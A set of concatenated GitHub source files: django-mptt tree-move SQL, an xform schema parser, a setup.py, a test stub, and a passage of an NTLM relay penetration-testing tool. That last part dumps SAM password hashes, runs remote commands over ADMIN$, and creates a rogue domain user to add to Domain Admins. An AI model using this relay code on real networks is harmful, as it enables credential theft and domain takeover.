space_target = target_tree_id
new_tree_id = target_tree_id + 1
else:
raise ValueError(_('An invalid position was given: %s.') % position)
self._create_tree_space(space_target, )
if tree_id > space_target:
# The node's tree id has been incremented in the
# database - this change must be reflected in the node
# object for the method call below to operate on the
# correct tree.
setattr(node, self.get_tree_id_attr(), tree_id + 1)
self._make_child_root_node(node, new_tree_id, )
else:
if position == 'left':
if target_tree_id > tree_id:
left_sibling = target.get_previous_sibling()
if node == left_sibling:
return
new_tree_id = getattr(left_sibling, self.get_tree_id_attr())
lower_bound, upper_bound = tree_id, new_tree_id
shift = -1
else:
new_tree_id = target_tree_id
lower_bound, upper_bound = new_tree_id, tree_id
shift = 1
elif position == 'right':
if target_tree_id > tree_id:
new_tree_id = target_tree_id
lower_bound, upper_bound = tree_id, target_tree_id
shift = -1
else:
right_sibling = target.get_next_sibling()
if node == right_sibling:
return
new_tree_id = getattr(right_sibling, self.get_tree_id_attr())
lower_bound, upper_bound = new_tree_id, tree_id
shift = 1
else:
raise ValueError(_('An invalid position was given: %s.') % position)
root_sibling_query = """
UPDATE %(table)s
SET %(tree_id)s = CASE
WHEN %(tree_id)s = %%s
THEN %%s
ELSE %(tree_id)s + %%s END
WHERE %(tree_id)s >= %%s AND %(tree_id)s <= %%s""" % {
'table': qn(self.tree_model._meta.db_table),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
}
cursor = self._get_connection(node).cursor()
cursor.execute(root_sibling_query, [tree_id, new_tree_id, shift,
lower_bound, upper_bound])
setattr(node, self.get_tree_id_attr(), new_tree_id)
def _manage_space(self, size, target, tree_id):
"""
Manages spaces in the tree identified by ``tree_id`` by changing
the values of the left and right columns by ``size`` after the
given ``target`` point.
"""
opts = self.model._meta
space_query = """
UPDATE %(table)s
SET %(left)s = CASE
WHEN %(left)s > %%s
THEN %(left)s + %%s
ELSE %(left)s END,
%(right)s = CASE
WHEN %(right)s > %%s
THEN %(right)s + %%s
ELSE %(right)s END
WHERE %(tree_id)s = %%s
AND (%(left)s > %%s OR %(right)s > %%s)""" % {
'table': qn(self.tree_model._meta.db_table),
'left': qn(opts.get_field(self.get_left_attr()).column),
'right': qn(opts.get_field(self.get_right_attr()).column),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
}
cursor = self._get_connection(self.model).cursor()
cursor.execute(space_query, [target, size, target, size, tree_id,
target, target])
def _move_child_node(self, node, target, position):
"""
Calls the appropriate method to move child node ``node``
relative to the given ``target`` node as specified by
``position``.
"""
tree_id = getattr(node, self.get_tree_id_attr())
target_tree_id = getattr(target, self.get_tree_id_attr())
if tree_id == target_tree_id:
self._move_child_within_tree(node, target, position)
else:
self._move_child_to_new_tree(node, target, position)
def _move_child_to_new_tree(self, node, target, position):
"""
Moves child node ``node`` to a different tree, inserting it
relative to the given ``target`` node in the new tree as
specified by ``position``.
``node`` will be modified to reflect its new tree state in the
database.
"""
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
level = getattr(node, self.get_level_attr())
new_tree_id = getattr(target, self.get_tree_id_attr())
space_target, level_change, left_right_change, parent, new_parent_right = \
self._calculate_inter_tree_move_values(node, target, position,)
tree_width = right - left + 1
# Make space for the subtree which will be moved
self._create_space(tree_width, space_target, new_tree_id)
# Move the subtree
self._inter_tree_move_and_close_gap(node, level_change,
left_right_change, new_tree_id, parent.pk, )
# Update the node to be consistent with the updated
# tree in the database.
setattr(node, self.get_left_attr(), left - left_right_change)
setattr(node, self.get_right_attr(), right - left_right_change)
setattr(node, self.get_level_attr(), level - level_change)
setattr(node, self.get_tree_id_attr(), new_tree_id)
setattr(node, self.get_parent_attr(), parent)
node._mptt_cached_fields[self.get_parent_attr()] = parent.pk
def _move_child_within_tree(self, node, target, position):
"""
Moves child node ``node`` within its current tree relative to
the given ``target`` node as specified by ``position``.
``node`` will be modified to reflect its new tree state in the
database.
"""
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
level = getattr(node, self.get_level_attr())
width = right - left + 1
tree_id = getattr(node, self.get_tree_id_attr())
target_left = getattr(target, self.get_left_attr())
target_right = getattr(target, self.get_right_attr())
target_level = getattr(target, self.get_level_attr())
if position == 'last-child' or position == 'first-child':
if node == target:
raise InvalidMove(_('A node may not be made a child of itself.'))
elif left < target_left < right:
raise InvalidMove(_('A node may not be made a child of any of its descendants.'))
if position == 'last-child':
if target_right > right:
new_left = target_right - width
new_right = target_right - 1
else:
new_left = target_right
new_right = target_right + width - 1
else:
if target_left > left:
new_left = target_left - width + 1
new_right = target_left
else:
new_left = target_left + 1
new_right = target_left + width
level_change = level - target_level - 1
parent = target
elif position == 'left' or position == 'right':
if node == target:
raise InvalidMove(_('A node may not be made a sibling of itself.'))
elif left < target_left < right:
raise InvalidMove(_('A node may not be made a sibling of any of its descendants.'))
if position == 'left':
if target_left > left:
new_left = target_left - width
new_right = target_left - 1
else:
new_left = target_left
new_right = target_left + width - 1
else:
if target_right > right:
new_left = target_right - width + 1
new_right = target_right
else:
new_left = target_right + 1
new_right = target_right + width
level_change = level - target_level
parent = getattr(target, self.get_parent_attr())
else:
raise ValueError(_('An invalid position was given: %s.') % position)
left_boundary = min(left, new_left)
right_boundary = max(right, new_right)
left_right_change = new_left - left
gap_size = width
if left_right_change > 0:
gap_size = -gap_size
opts = self.model._meta
# The level update must come before the left update to keep
# MySQL happy - left seems to refer to the updated value
# immediately after its update has been specified in the query
# with MySQL, but not with SQLite or Postgres.
move_subtree_query = """
UPDATE %(table)s
SET %(level)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(level)s - %%s
ELSE %(level)s END,
%(left)s = CASE
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(left)s + %%s
WHEN %(left)s >= %%s AND %(left)s <= %%s
THEN %(left)s + %%s
ELSE %(left)s END,
%(right)s = CASE
WHEN %(right)s >= %%s AND %(right)s <= %%s
THEN %(right)s + %%s
WHEN %(right)s >= %%s AND %(right)s <= %%s
THEN %(right)s + %%s
ELSE %(right)s END,
%(parent)s = CASE
WHEN %(pk)s = %%s
THEN %%s
ELSE %(parent)s END
WHERE %(tree_id)s = %%s""" % {
'table': qn(self.tree_model._meta.db_table),
'level': qn(opts.get_field(self.get_level_attr()).column),
'left': qn(opts.get_field(self.get_left_attr()).column),
'right': qn(opts.get_field(self.get_right_attr()).column),
'parent': qn(opts.get_field(self.get_parent_attr()).column),
'pk': qn(opts.pk.column),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
}
cursor = self._get_connection(node).cursor()
cursor.execute(move_subtree_query, [
left, right, level_change,
left, right, left_right_change,
left_boundary, right_boundary, gap_size,
left, right, left_right_change,
left_boundary, right_boundary, gap_size,
node.pk, parent.pk,
tree_id])
# Update the node to be consistent with the updated
# tree in the database.
setattr(node, self.get_left_attr(), new_left)
setattr(node, self.get_right_attr(), new_right)
setattr(node, self.get_level_attr(), level - level_change)
setattr(node, self.get_parent_attr(), parent)
node._mptt_cached_fields[self.get_parent_attr()] = parent.pk
def _move_root_node(self, node, target, position):
"""
        Moves root node ``node`` to a different tree, inserting it
relative to the given ``target`` node as specified by
``position``.
``node`` will be modified to reflect its new tree state in the
database.
"""
left = getattr(node, self.get_left_attr())
right = getattr(node, self.get_right_attr())
level = getattr(node, self.get_level_attr())
tree_id = getattr(node, self.get_tree_id_attr())
new_tree_id = getattr(target, self.get_tree_id_attr())
width = right - left + 1
if node == target:
raise InvalidMove(_('A node may not be made a child of itself.'))
elif tree_id == new_tree_id:
raise InvalidMove(_('A node may not be made a child of any of its descendants.'))
space_target, level_change, left_right_change, parent, right_shift = \
self._calculate_inter_tree_move_values(node, target, position,)
# Create space for the tree which will be inserted
self._create_space(width, space_target, new_tree_id)
# Move the root node, making it a child node
opts = self.model._meta
move_tree_query = """
UPDATE %(table)s
SET %(level)s = %(level)s - %%s,
%(left)s = %(left)s - %%s,
%(right)s = %(right)s - %%s,
%(tree_id)s = %%s,
%(parent)s = CASE
WHEN %(pk)s = %%s
THEN %%s
ELSE %(parent)s END
WHERE %(left)s >= %%s AND %(left)s <= %%s
AND %(tree_id)s = %%s""" % {
'table': qn(self.tree_model._meta.db_table),
'level': qn(opts.get_field(self.get_level_attr()).column),
'left': qn(opts.get_field(self.get_left_attr()).column),
'right': qn(opts.get_field(self.get_right_attr()).column),
'tree_id': qn(opts.get_field(self.get_tree_id_attr()).column),
'parent': qn(opts.get_field(self.get_parent_attr()).column),
'pk': qn(opts.pk.column),
}
cursor = self._get_connection(node).cursor()
cursor.execute(move_tree_query, [level_change, left_right_change,
left_right_change, new_tree_id, node.pk, parent.pk, left, right,
tree_id])
# Update the former root node to be consistent with the updated
# tree in the database.
setattr(node, self.get_left_attr(), left - left_right_change)
setattr(node, self.get_right_attr(), right - left_right_change)
setattr(node, self.get_level_attr(), level - level_change)
setattr(node, self.get_tree_id_attr(), new_tree_id)
setattr(node, self.get_parent_attr(), parent)
node._mptt_cached_fields[self.get_parent_attr()] = parent.pk
| {
"content_hash": "5f49ea4d91c1811709fe241fa83717b4",
"timestamp": "",
"source": "github",
"line_count": 907,
"max_line_length": 99,
"avg_line_length": 39.50826901874311,
"alnum_prop": 0.5429201317184796,
"repo_name": "danielnaab/django-mptt",
"id": "848dad0e3fc5eb4fb50a761038d281979b867d3c",
"size": "35834",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mptt/managers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "140622"
},
{
"name": "Shell",
"bytes": "115"
}
],
"symlink_target": ""
} |
from xformmanager.util import *
# unfortunately, have to do something like this because of semi-circular dependencies
import xformmanager as xfm
from lxml import etree
import logging
XPATH_SEPARATOR = "/"
class ElementDef(object):
""" Stores metadata about simple and complex types """
def __init__(self, name='', is_repeatable=False, domain=None):
self.name = name
self.xpath = ''
        if domain and not getattr(self, "domain", None):
self.domain=domain
self.child_elements = []
self.type = ''
self.is_repeatable = is_repeatable
#self.attributes - not supported yet
# this var is a device for getting diffs between defs
self._visited = False
def __unicode__(self):
return unicode(self.xpath)
def __str__(self):
return unicode(self).encode('utf-8')
@property
def short_name(self):
""" This is the unqualified tag of the element
(without qualifying namespace or xpath) """
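        # Illustrative example (comment added for clarity): for an element
        # whose xpath is "patient/visit/date" this returns "date"; an xpath
        # with no separator is returned unchanged.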
c = unicode(self.xpath).rsplit(XPATH_SEPARATOR, 1)
if len(c)==2:
return c[1]
return c[0]
def to_str(self, depth=0, string=''):
""" Dumps the entire contents of this to a string """
indent = ' '*depth
string = indent + "xpath=" + str(self.xpath) + "\n"
string = string + indent + \
"name=" + str(self.name) + \
", type=" + str(self.type) + \
", repeatable=" + str(self.is_repeatable) + "\n"
for child in self.child_elements:
string = string + child.to_str(depth+1, string)
return string
def isValid(self):
# TODO: place restriction functions in here
pass
def addChild(self, element_def):
self.child_elements.append(element_def)
def populateElementFields(self, input_node, xpath, full_name):
if not self.name: self.name = full_name
self.type = input_node.get('type')
if xpath:
self.xpath = xpath + XPATH_SEPARATOR + input_node.get('name')
else:
self.xpath = input_node.get('name')
def find_child(self, child):
""" Looks for child among child_elements of self.
Equivalence is currently based on short_name. """
for candidate in self.child_elements:
if candidate.short_name == child.short_name:
return candidate
return None
def _clear_visited(self):
""" _visited is a device for getting diffs between defs """
for child in self.child_elements:
child._visited = False
child._clear_visited()
def _get_unvisited(self, root=None):
""" _visited is a device for getting diffs between defs """
d = []
if root is None:
# hm, I guess you can't pass 'self' as a default argument...
root = self
for child in root.child_elements:
if not child._visited:
d.append( child )
d = d + self._get_unvisited(child)
return d
def _get_elementdef_diff(self, otherdef):
""" Determines whether two elementdef leaves are equivalent
(but does not check for children equivalency) We can always
extend this later to provide richer diff information """
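        # Example (comment added for clarity, hypothetical values): if only the
        # type differs between the two defs (say 'xsd:string' vs 'xsd:int'),
        # otherdef is appended to fields_changed and nothing else is recorded.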
d = Differences()
if self.name != otherdef.name or \
self.xpath != otherdef.xpath or \
self.type != otherdef.type or \
self.is_repeatable != otherdef.is_repeatable:
d.fields_changed.append( otherdef )
otherdef._visited = True
return d
def _get_children_diff(self, otherdef):
d = Differences()
for child in self.child_elements:
# find matching child in otherdef
# assumption: the schemas provided are well-formed
# and do not contain duplicate children
otherchild = otherdef.find_child( child )
if not otherchild:
d.fields_removed.append(child)
else:
d = d + child._get_elementdef_diff(otherchild)
d = d + child._get_children_diff(otherchild)
return d
class FormDef(ElementDef):
"""Stores metadata about forms"""
# When this code was written, I didn't realize XML requires having
# only one root element. Ergo, the root of this xml is accessed via
# FormDef.root (rather than just FormDef)
def __init__(self, input_stream=None, child_element=None, domain=None,
**kwargs):
"""Either a stream pointer to an XML stream to populate this form
or a child element to a valid element_def should be provided.
If neither is, this is a pretty useless form"""
# call the base class to initialize some more properties
super(FormDef, self).__init__(**kwargs)
# set some high level concepts
self.types = {}
self.version = None
self.uiversion = None
self.target_namespace = ''
if input_stream is not None and child_element is not None:
# log this, cause it's a bad idea
logging.error("""Both XML and a child element explicitly passed to
create a new formdef. The child element %s will be
ignored""" % child_element)
if input_stream is not None:
# populate all of the child elements
payload = get_xml_string(input_stream)
self.populateFromXmlString(payload)
elif child_element is not None:
self.child_elements = [child_element]
if len(self.child_elements)>1:
# fail hard on too many children, since it's bad xml
raise Exception("Poorly formed XML. Multiple root elements!")
if not self.child_elements:
logging.info("You just created a formdef %s with no children. Why?!" % self)
#logging.error("You just created a formdef %s with no children. Why?!" % self)
else:
# safe to set a root node here
self.root = self.child_elements[0]
self.domain = domain
def __unicode__(self):
return unicode(self.target_namespace)
def __str__(self):
return unicode(self).encode('utf-8')
@classmethod
def from_file(cls, file, valid=True):
""" By default, schemas read off of the file system are forced to be valid
(for now, this just means that poorly formatted versions are forced to None)
"""
fin = open(file, 'r')
formdef = FormDef(fin)
if valid:
formdef.force_to_valid()
fin.close()
return formdef
def to_str(self):
""" Dumps the entire contents of this to a string """
string = "\nDEFINITION OF " + str(self.name) + "\n"
string = string + "TYPES: \n"
for t in self.types:
string = string + self.types[t].name + "\n"
for allowable_value in self.types[t].allowable_values:
string = string + " allowable_value: " + allowable_value + "\n"
for multiselect_value in self.types[t].multiselect_values:
string = string + " multiselect_value: " + multiselect_value + "\n"
string = string + "ELEMENTS: \n"
return string + ElementDef.to_str(self)
def populateFromXmlString(self, string):
""" Populates formdef with data from xml string
Note that we currently allow 'bad form' xforms
(e.g. bad metadata, bad version numbers)
Such errors can be caught/reported using FormDef.validate()
"""
root = etree.XML(string)
self.version = case_insensitive_attribute(root, "version")
self.uiversion = case_insensitive_attribute(root, "uiversion")
self.target_namespace = case_insensitive_attribute(root, 'targetNamespace')
if not self.target_namespace:
logging.error("Target namespace is not found in xsd schema")
ElementDef.__init__(self, self.target_namespace)
self.xpath = ""
self._addAttributesAndChildElements(self, root, '')
@property
def root_element(self):
'''Get the root ElementDef for this form. This will throw an
        exception if there is not exactly one root child defined.'''
if len(self.child_elements) != 1:
raise Exception("Tried to get the single root from %s but found %s nodes"
% (self, len(self.child_elements)))
return self.child_elements[0]
@property
def domain_name(self):
"""Get the domain name, or an empty string if none found"""
if self.domain:
return self.domain.name
return ""
def get_meta_element(self):
'''Gets the meta element from the form, if it exists.
Meta is defined as a top-level child of the form with
the name "meta" (case insenitive). If no meta block
is found, this returns nothing'''
for child in self.root_element.child_elements:
if child.short_name.lower() == "meta":
return child
@classmethod
def get_meta_validation_issues(cls, element):
'''Validates an ElementDef, assuming it is a meta block. Ensures
that every field we expect to find in the meta is there, and
that there are no extra fields. Returns a dictionary of
of any errors/warnings found in the following format:
{ "missing" : [list, of, missing, expected, fields]
"duplicate" : [list, of, duplicate, fields]
"extra" : [list, of, unexpected, fields]
}
If any of these lists are empty they won't be in the dictionary,
and therefore if all are empty this method will return an empty
dictionary.
'''
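        # Illustrative (hypothetical field names) return value: a meta block
        # that repeats "deviceid" and omits "timestart" would yield
        #   {"missing": ["timestart"], "duplicate": ["deviceid"]}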
missing_fields = []
extra_fields = []
duplicate_fields = []
found_fields = []
missing_fields.extend(xfm.models.Metadata.fields)
# hackily remove some stuff we no longer want to require
missing_fields.remove('formname')
missing_fields.remove('formversion')
for field in element.child_elements:
field_name = field.short_name.lower()
if field_name in missing_fields:
missing_fields.remove(field_name)
found_fields.append(field_name)
elif field_name in found_fields:
# it was already found, therefore it must be
# a duplicate
duplicate_fields.append(field_name)
else:
# it wasn't in the expected list, and wasn't a
# dupe, it must be an extra
extra_fields.append(field_name)
to_return = {}
if missing_fields:
to_return["missing"] = missing_fields
if duplicate_fields:
to_return["duplicate"] = duplicate_fields
if extra_fields:
to_return["extra"] = extra_fields
return to_return
def _addAttributesAndChildElements(self, element, input_tree, name_prefix):
for input_node in etree.ElementChildIterator(input_tree):
name = str(input_node.get('name'))
if (str(input_node.tag)).find("element") > -1:
next_name_prefix = ''
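                # note (comment added for clarity): maxOccurs is a string such
                # as '1', '5' or 'unbounded' (or None when absent); under
                # Python 2 any non-None string compares greater than the int 1,
                # so any element with an explicit maxOccurs is treated as
                # repeatable here.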
if input_node.get('maxOccurs') > 1:
child_element = ElementDef(is_repeatable=True)
child_element.populateElementFields(input_node, element.xpath, name)
else:
child_element = ElementDef()
# discard parent_name
next_name_prefix = join_if_exists( name_prefix, name )
full_name = next_name_prefix
child_element.populateElementFields(input_node, element.xpath, full_name)
element.addChild(child_element)
# theoretically, simpleType enumerations and list values can be
# defined inside of elements in practice, this isn't how things
# are currently generated in the schema generator, so we don't
# support that (yet)
self._addAttributesAndChildElements(child_element, input_node, next_name_prefix )
elif (str(input_node.tag)).find("simpleType") > -1:
simpleType = SimpleType( str(input_node.get('name')) )
child = input_node[0]
if (str(child.tag)).find("restriction") > -1:
for enum in child:
if (str(enum.tag)).find("enumeration") > -1:
simpleType.allowable_values.append( sanitize(enum.get("value")) )
elif (str(child.tag)).find("list") > -1:
multiselect_name = child.get("itemType")
                    if self.types.get(multiselect_name) is not None:
simpleType.multiselect_values = self.types[multiselect_name].allowable_values
# add new type definition
self.types[simpleType.name] = simpleType
else:
                # Skip non-elements (e.g. <sequence>, <complexType>)
self._addAttributesAndChildElements(element, input_node, name_prefix)
def validate(self):
# check xmlns not none
namespace_help_text = "You should find the block in your xform labeled <instance> and " + \
"add an xmlns attribute to the first element so it looks like: " + \
'<instance><node xmlns="http://your.xmlns.goes/here">. An xmlns ' + \
"is a unique attribute that helps identify the form"
if not self.target_namespace:
raise FormDef.FormDefError("No namespace (xmlns) found in submitted form: %s" % \
self.name, FormDef.FormDefError.ERROR, namespace_help_text)
# all the forms in use today have a superset namespace they default to
# something like: http://www.w3.org/2002/xforms
if self.target_namespace.lower().find('www.w3.org') != -1:
raise FormDef.FormDefError("No unique namespace (xmlns) found in submitted form: %s" % \
self.target_namespace, FormDef.FormDefError.ERROR,
namespace_help_text)
if self.version is None or self.version.strip() == "":
raise FormDef.FormDefError("No version number found in submitted form: %s" % \
self.target_namespace, FormDef.FormDefError.WARNING)
if not self.version.strip().isdigit():
# should make this into a custom exception
raise FormDef.FormDefError("Version attribute must be an integer in xform %s but was %s" % \
(self.target_namespace, self.version), FormDef.FormDefError.WARNING)
meta_element = self.get_meta_element()
if not meta_element:
raise FormDef.FormDefError("From %s had no meta block!" % self.target_namespace, FormDef.FormDefError.WARNING)
meta_issues = FormDef.get_meta_validation_issues(meta_element)
if meta_issues:
mve = xfm.models.MetaDataValidationError(meta_issues, self.target_namespace)
# until we have a clear understanding of how meta versions will work,
# don't fail on issues that only come back with "extra" set. i.e.
# look for missing or duplicate
if mve.duplicate or mve.missing:
raise mve
else:
logging.warning("Found extra meta fields in xform %s: %s" %
(self.target_namespace, mve.extra))
# validated!
return True
def force_to_valid(self):
if self.version and self.version.strip().isdigit():
self.version = int(self.version.strip())
else:
self.version = None
if self.uiversion and self.uiversion.strip().isdigit():
self.uiversion = int(self.uiversion.strip())
else:
self.uiversion = None
def is_compatible_with(self, otherdef):
""" are these two formdef's compatible
i.e. can they share the same raw data tables
"""
return self.get_differences(otherdef).is_empty()
def get_differences(self, otherdef):
# Not sure if it's bad form to be relying on modifying this
# '_visited' variable, but this seems like the most
# straightforward solution for now
otherdef._clear_visited()
d = self._get_formdef_diff(otherdef)
d = d + self._get_children_diff(otherdef)
d.fields_added = otherdef._get_unvisited()
return d
def _get_formdef_diff(self, otherdef):
d = self._get_elementdef_diff(otherdef)
# currently, the only relevant differences to check per formdef
# are the type definitions
for i in self.types:
if i in otherdef.types:
if self.types[i] != otherdef.types[i]:
d.types_changed.append(otherdef.types[i])
# if i not in otherdef.types
# this is fine, as long as it's not referenced somewhere
# if it's references somewhere, that'll be captured as
# a field_changed diff
# we don't need to check for types added
# since this will be reported in the form of 'field added' or 'field changed'
return d
class FormDefError(Exception):
"""Error from FormDef Processing. Allows for specification
of an additional 'category' which can separate true errors
from warning-type errors."""
ERROR = 1
WARNING = 2
def __init__(self, message, category, help_text=""):
super(FormDef.FormDefError, self).__init__(message)
self.category = category
self.help_text = help_text
class SimpleType(object):
""" Stores type definition for simple types """
def __init__(self, name=''):
self.allowable_values = []
self.multiselect_values = []
self.name = name
def __ne__(self, other):
""" case-insensitive comparison """
# we do case-sensitive comparison, since xml is case-sensitive
return not (self == other)
def __eq__(self, other):
""" case-insensitive comparison """
# we do case-sensitive comparison, since xml is case-sensitive
return (self.multiselect_values == other.multiselect_values) and \
(self.allowable_values == other.allowable_values) and \
(self.name == other.name)
""" we may want case-insensitive comparison later, which would be:
return ([i.lower() for i in self.multiselect_values] == \
[j.lower() for j in other.multiselect_values]) and \
([i.lower() for i in self.allowable_values] == \
[j.lower() for j in other.allowable_values]) and \
(self.name.lower() == other.name.lower())
"""
class Differences(object):
""" Data structure to represent the differences between this and another formdef """
def __init__(self):
self.otherdef = None
self.fields_added = []
self.fields_removed = []
self.fields_changed = []
# types added is not required for now, since it will also
# be caught by fields_changed or fields_added
self.types_changed = []
def __add__(self, other):
d = Differences()
d.fields_added = self.fields_added + other.fields_added
d.fields_removed = self.fields_removed + other.fields_removed
d.fields_changed = self.fields_changed + other.fields_changed
d.types_changed = self.types_changed + other.types_changed
return d
def is_empty(self):
'''Return whether this is meaningfully empty (i.e. representing
        no differences).'''
return not (self.fields_added or self.fields_changed or \
self.fields_removed or self.types_changed)
def __unicode__(self):
if self.is_empty():
return "No differences"
else:
attrs = ["fields_added", "fields_removed", "fields_changed", "types_changed"]
msgs = [self._display_string(attr) for attr in attrs]
return "\n".join([display for display in msgs if display])
def __str__(self):
return unicode(self).encode('utf-8')
def _display_string(self, attr):
if hasattr(self, attr):
vals = getattr(self, attr)
if vals:
val_strs = [str(val) for val in vals]
return "%s %s: %s" % (len(val_strs),
attr.replace("_", " "),
",".join(val_strs))
return "" | {
"content_hash": "654e89340e60065fced2e553535ef844",
"timestamp": "",
"source": "github",
"line_count": 497,
"max_line_length": 122,
"avg_line_length": 43.06438631790744,
"alnum_prop": 0.5696397701256833,
"repo_name": "icomms/wqmanager",
"id": "7df954061c5e2b02993591e439f2767565ba2361",
"size": "21403",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/xformmanager/xformdef.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "793418"
},
{
"name": "PHP",
"bytes": "2863"
},
{
"name": "Python",
"bytes": "3735941"
},
{
"name": "Shell",
"bytes": "383"
}
],
"symlink_target": ""
} |
import os
from setuptools import setup, find_packages
def read(fname):
buf = open(os.path.join(os.path.dirname(__file__), fname), 'rb').read()
return buf.decode('utf8')
setup(name='mtgjson',
version='0.4.1.dev1',
description='A python library for working with data from mtgjson.com.',
long_description=read('README.rst'),
author='Marc Brinkmann',
author_email='[email protected]',
url='http://github.com/mbr/pymtgjson',
license='MIT',
packages=find_packages(exclude=['tests']),
install_requires=['docutils', 'requests', 'six'],
classifiers=[
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
])
| {
"content_hash": "d7f529d6c659333197bc118bb4151c48",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 77,
"avg_line_length": 30.208333333333332,
"alnum_prop": 0.6220689655172413,
"repo_name": "mbr/pymtgjson",
"id": "29b54ca9751c8b6920b8fac45349e7e24d66ec8d",
"size": "772",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10717"
}
],
"symlink_target": ""
} |
from sklearn2sql_heroku.tests.regression import generic as reg_gen
reg_gen.test_model("SVR_poly" , "freidman1" , "sqlite")
| {
"content_hash": "4328e0ff8f96f94cf3a9270e9e094d00",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 66,
"avg_line_length": 31.25,
"alnum_prop": 0.752,
"repo_name": "antoinecarme/sklearn2sql_heroku",
"id": "6f32db4cc1fd39577c786d93061d8f9e17356a46",
"size": "125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/regression/freidman1/ws_freidman1_SVR_poly_sqlite_code_gen.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "507043"
},
{
"name": "Procfile",
"bytes": "37"
},
{
"name": "Python",
"bytes": "1021137"
},
{
"name": "R",
"bytes": "2521"
}
],
"symlink_target": ""
} |
import argparse
import sys
import thread
import logging
import random
import string
import re
import os
from threading import Thread
from impacket import version, smb3, smb
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.utils.tcpshell import TcpShell
from impacket.smbconnection import SMBConnection
from smbclient import MiniImpacketShell
class SMBAttack(Thread):
def __init__(self, config, SMBClient, username):
Thread.__init__(self)
self.daemon = True
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.config = config
self.__answerTMP = ''
if self.config.interactive:
#Launch locally listening interactive shell
self.tcpshell = TcpShell()
else:
self.tcpshell = None
if self.config.exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
logging.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
                # Something went wrong, most probably we don't have access as admin. Aborting
logging.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
print self.__answerTMP.decode(self.config.encoding, 'replace')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
#Define global variables to prevent dumping the domain twice
dumpedDomain = False
addedDomainAdmin = False
class LDAPAttack(Thread):
def __init__(self, config, LDAPClient, username):
Thread.__init__(self)
self.daemon = True
#Import it here because non-standard dependency
self.ldapdomaindump = __import__('ldapdomaindump')
self.client = LDAPClient
self.username = username.decode('utf-16le')
#Global config
self.config = config
def addDA(self, domainDumper):
global addedDomainAdmin
if addedDomainAdmin:
logging.error('DA already added. Refusing to add another')
return
#Random password
newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
#Random username
newUser = ''.join(random.choice(string.ascii_letters) for _ in range(10))
ucd = {
'objectCategory': 'CN=Person,CN=Schema,CN=Configuration,%s' % domainDumper.root,
'distinguishedName': 'CN=%s,CN=Users,%s' % (newUser,domainDumper.root),
'cn': newUser,
'sn': newUser,
'givenName': newUser,
'displayName': newUser,
'name': newUser,
'userAccountControl': 512,
'accountExpires': 0,
'sAMAccountName': newUser,
'unicodePwd': '"{}"'.format(newPassword).encode('utf-16-le')
}
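        # Comment added for clarity: Active Directory requires unicodePwd to be
        # the new password wrapped in double quotes and encoded as UTF-16-LE,
        # which is exactly what the dictionary entry above constructs.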
res = self.client.connection.add('CN=%s,CN=Users,%s' % (newUser,domainDumper.root),['top','person','organizationalPerson','user'],ucd)
if not res:
logging.error('Failed to add a new user: %s' % str(self.client.connection.result))
else:
logging.info('Adding new user with username: %s and password: %s result: OK' % (newUser,newPassword))
domainsid = domainDumper.getRootSid()
dagroupdn = domainDumper.getDAGroupDN(domainsid)
